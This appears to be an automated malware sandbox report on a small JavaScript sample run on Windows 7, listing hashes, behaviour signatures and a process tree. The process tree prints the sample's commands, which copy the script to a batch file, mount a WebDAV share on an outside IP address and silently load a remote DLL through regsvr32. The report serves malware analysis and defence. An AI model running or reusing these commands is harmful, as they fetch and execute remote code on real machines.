Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
08/07/2024, 18:56
General
-
Target
288623129288629811.js
-
Size
5KB
-
MD5
27ec8012c9813c8ff50ebe971de23bfb
-
SHA1
8df64433d6f743c2524c7b210a71b2b29b943a81
-
SHA256
327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
-
SHA512
07abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423
-
SSDEEP
96:iQlr8O3jvfPlMOOOOrTTPOOOD9VvK6IiojFVYjMYValVgkxVX:vIO7fdMOOO8zOOO51KtjFVYjMYAl6kxR
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\288623129288629811.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\288623129288629811.js" "C:\Users\Admin\\hmidau.bat" && "C:\Users\Admin\\hmidau.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\419.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD527ec8012c9813c8ff50ebe971de23bfb
SHA18df64433d6f743c2524c7b210a71b2b29b943a81
SHA256327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
SHA51207abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423